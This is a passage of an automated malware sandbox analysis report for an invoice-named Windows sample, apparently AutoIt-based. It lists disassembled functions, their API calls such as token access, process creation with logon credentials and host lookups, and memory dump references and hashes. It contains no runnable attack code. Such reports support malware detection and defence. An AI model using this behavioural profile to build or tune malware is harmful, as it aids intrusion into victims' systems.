                                                                            • Instruction ID: 9852fb06b7bd36bbdb6dc09562e783204d71ca9b2c205a30d1d3afeb37861324
                                                                            • Opcode Fuzzy Hash: c05e9a3f88fb06b10be24493e3639f047e5d1a0abb5b9f33dd20afd1ba3cb3fc
                                                                            • Instruction Fuzzy Hash: 19110672A04A1DAECF312F70AC0577F37D89F10771B10192AFB04AA1E0DEB08840BB90
                                                                            Function 00ED44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00ED44CF
                                                                              • Part of subcall function 00ED407C: _memset.LIBCMT ref: 00ED40FC
                                                                              • Part of subcall function 00ED407C: _wcscpy.LIBCMT ref: 00ED4150
                                                                              • Part of subcall function 00ED407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ED4160
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00ED4524
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ED4533
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F0D4B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: 2f4b4cf02cc61711486b0ac9cde6a28d981fc50fb7553cca0d3c6f0f705b2bc6
                                                                            • Instruction ID: 7eae647987063b0f1865651e8c0d6535e2d2c53e130c428598543b258ac7053f
                                                                            • Opcode Fuzzy Hash: 2f4b4cf02cc61711486b0ac9cde6a28d981fc50fb7553cca0d3c6f0f705b2bc6
                                                                            • Instruction Fuzzy Hash: BA21F5B4904788AFE732CB649855BE6BBECDB15318F04109EE78E662C1C3742A85EB41
                                                                            Function 00F285B1 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F285E2
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00F285E9
                                                                            • CloseHandle.KERNEL32(00000004), ref: 00F28603
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F28632
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 2621361867-0
                                                                            • Opcode ID: 36a355df30eba9b277815d6afef514e81f3bf5c1442ef6d2776da7dc03a4e62d
                                                                            • Instruction ID: 097c748c020bd0da509d7ca3e59a0e12826a4f0a5b75c85fcb2765168d4b1ac7
                                                                            • Opcode Fuzzy Hash: 36a355df30eba9b277815d6afef514e81f3bf5c1442ef6d2776da7dc03a4e62d
                                                                            • Instruction Fuzzy Hash: F1116AB250220DABDF018FA4ED49FDE7BA9EF08355F084064FE05A21A0C7729D65EB60
                                                                            Function 00F46369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37896,?,?,00000000), ref: 00ED5A2C
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37896,?,?,00000000,?,?), ref: 00ED5A50
                                                                            • gethostbyname.WS2_32(?), ref: 00F46399
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F463A4
                                                                            • _memmove.LIBCMT ref: 00F463D1
                                                                            • inet_ntoa.WS2_32(?), ref: 00F463DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 1504782959-0
                                                                            • Opcode ID: 5e169a044ee3fb74f33b5b7f84041221b56ed9879ee9d337db357f1d62ebc073
                                                                            • Instruction ID: 1540d25b291dc7f27ca3bd9ba37f7ebbe848e8c92f707df7c67ee9cdad81b7c8
                                                                            • Opcode Fuzzy Hash: 5e169a044ee3fb74f33b5b7f84041221b56ed9879ee9d337db357f1d62ebc073
                                                                            • Instruction Fuzzy Hash: E1115136900109AFCB04FBA4DD46CAE7BB8EF04321B144066F905B7262DB309E09EB61
                                                                            Function 00F28B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F28B61
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F28B73
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F28B89
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F28BA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 67f34aad597aca3a57e942cba9dba414fa2b1e3a3620d3f54a51f480af08cbfc
                                                                            • Instruction ID: 693ce09fde8b96042534e476b005317d893f5fc4e2d1d4670ff627f6af94e7b4
                                                                            • Opcode Fuzzy Hash: 67f34aad597aca3a57e942cba9dba414fa2b1e3a3620d3f54a51f480af08cbfc
                                                                            • Instruction Fuzzy Hash: 30111C79901218FFDB11DF95CC85F9DBBB4FB48750F204095EA00B7250DA716E11EB94
                                                                            Function 00F31142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F3115F
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F31184
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F3118E
                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00F2FCED,?,00F30D40,?,00008000), ref: 00F311C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: c1a5568083fa8c4e7a5f43dd93a7de6481ee509185ec0333dad38f5c041c4602
                                                                            • Instruction ID: ac6363a183297a54c2d50447a6a17729b938eeba842631785a0c1cbe515a5006
                                                                            • Opcode Fuzzy Hash: c1a5568083fa8c4e7a5f43dd93a7de6481ee509185ec0333dad38f5c041c4602
                                                                            • Instruction Fuzzy Hash: 50113C32D01A1DD7CF00AFA5D848AEEBBBCFF09721F504095EA41B2241CB709554EBA5
                                                                            Function 00F2D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F2D84D
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F2D864
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F2D879
                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F2D897
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            • Opcode ID: 2d81fa611a61c2afa1871c5eccca436eff7e43232aa85b7bfbc0f9070b3d7e7e
                                                                            • Instruction ID: d03e455b9e99104eb341331751dcd441074c80a2e3a925dfc8c3efb6c834cb7c
                                                                            • Opcode Fuzzy Hash: 2d81fa611a61c2afa1871c5eccca436eff7e43232aa85b7bfbc0f9070b3d7e7e
                                                                            • Instruction Fuzzy Hash: 11116175606324DBE320CF50EC08FD3BBBCEB00B00F108569A656D6090D7B0E549EBA1
                                                                            Function 00F06FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: 7a120ceccc5c8052d168e921847f7c84f5ada1ad5274fe17ea7dcf3c12f3ef68
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: 10014E7284424EBBCF166E84CC01CED3F66BB18355F588595FA18580B1D336E9B1BB81
                                                                            Function 00F5B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00F5B2E4
                                                                            • ScreenToClient.USER32(?,?), ref: 00F5B2FC
                                                                            • ScreenToClient.USER32(?,?), ref: 00F5B320
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5B33B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: 63dbb051b7f6f6b2a9de15785ba7b17bf59597a16261af1aafaa3362a5a0a245
                                                                            • Instruction ID: aea1afd0b41015d8d1fcc961126533186c04fa39b9a3a25f904d3d20f7494bfe
                                                                            • Opcode Fuzzy Hash: 63dbb051b7f6f6b2a9de15785ba7b17bf59597a16261af1aafaa3362a5a0a245
                                                                            • Instruction Fuzzy Hash: 681143B9D0060DEFDB41CFA9C8849EEBBB9FB08311F1081A6E914E3620D735AA559F50
                                                                            Function 00F5B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F5B644
                                                                            • _memset.LIBCMT ref: 00F5B653
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F96F20,00F96F64), ref: 00F5B682
                                                                            • CloseHandle.KERNEL32 ref: 00F5B694
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3277943733-0
                                                                            • Opcode ID: ecb907454d00bf9e10b7c69207f35826a4fa94c83da855eaf3ef9f871ff0e5b2
                                                                            • Instruction ID: 59509cb3a7bb2025ff3fd255ae20bd007c4f31748dfb189aa41493973bf52d7e
                                                                            • Opcode Fuzzy Hash: ecb907454d00bf9e10b7c69207f35826a4fa94c83da855eaf3ef9f871ff0e5b2
                                                                            • Instruction Fuzzy Hash: D9F012B294030C7BF7102765BC06FBB7A9CEB09799F004065FB08E51A2E7765C10A7A8
                                                                            Function 00F36BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00F36BE6
                                                                              • Part of subcall function 00F376C4: _memset.LIBCMT ref: 00F376F9
                                                                            • _memmove.LIBCMT ref: 00F36C09
                                                                            • _memset.LIBCMT ref: 00F36C16
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00F36C26
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                            • String ID:
                                                                            • API String ID: 48991266-0
                                                                            • Opcode ID: 2d118a844192aa766d189fed574b4872b2a23fc25a8dcbdc098b322317f72509
                                                                            • Instruction ID: 2936b209e10d7c2b046aa52d4c55372cdd819d477c291882f3864c6036123cfa
                                                                            • Opcode Fuzzy Hash: 2d118a844192aa766d189fed574b4872b2a23fc25a8dcbdc098b322317f72509
                                                                            • Instruction Fuzzy Hash: FDF05E7A200204ABCF016F55DC85A8ABF6AEF45361F04C0A5FF096E227CB35E811DBB4
                                                                            Function 00ED2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 00ED2231
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00ED223B
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00ED2250
                                                                            • GetStockObject.GDI32(00000005), ref: 00ED2258
                                                                            • GetWindowDC.USER32(?,00000000), ref: 00F0BE83
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F0BE90
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00F0BEA9
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00F0BEC2
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00F0BEE2
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00F0BEED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: 26cd0e47627f4b17420251d0682d37d9bc8a88ea20a9089868cb60853692ec92
                                                                            • Instruction ID: 308e8d658dc158c70e1a8aa67e5debec6aac0c74183f8b9ed35c172987a37194
                                                                            • Opcode Fuzzy Hash: 26cd0e47627f4b17420251d0682d37d9bc8a88ea20a9089868cb60853692ec92
                                                                            • Instruction Fuzzy Hash: 9CE03932504648AADB215FA4EC0DBD83B10EB15337F0483A6FB69980E187714985EB12
                                                                            Function 00F28712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 00F2871B
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F282E6), ref: 00F28722
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F282E6), ref: 00F2872F
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F282E6), ref: 00F28736
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 03851334d0fdcfaaf6ebeea01b742ab1c0c44a8225d8361eeb382a6881472675
                                                                            • Instruction ID: 639555a36e87f7d330a0f18960ce862789fb5329964efce95567230bfaaa98ef
                                                                            • Opcode Fuzzy Hash: 03851334d0fdcfaaf6ebeea01b742ab1c0c44a8225d8361eeb382a6881472675
                                                                            • Instruction Fuzzy Hash: E5E08676A123259BD7605FB06D0CB573BBCEF607E3F144868B345CA0C0DA34844AE750
                                                                            Function 00F2B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00F2B4BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ContainedObject
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3565006973-3941886329
                                                                            • Opcode ID: 0e382bd3a9b41fd54671293af173263da8c497ce25b309ebeab4e5529407c207
                                                                            • Instruction ID: 3729d1491d6276d10304f7ba77581d75c0f9889071e54ba65fd9ca4aea2687f8
                                                                            • Opcode Fuzzy Hash: 0e382bd3a9b41fd54671293af173263da8c497ce25b309ebeab4e5529407c207
                                                                            • Instruction Fuzzy Hash: 0D916771600611AFDB14DF64D885B6ABBE9FF48710F24856DED0ACF2A2DB70E841DB50
                                                                            Function 00F3AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
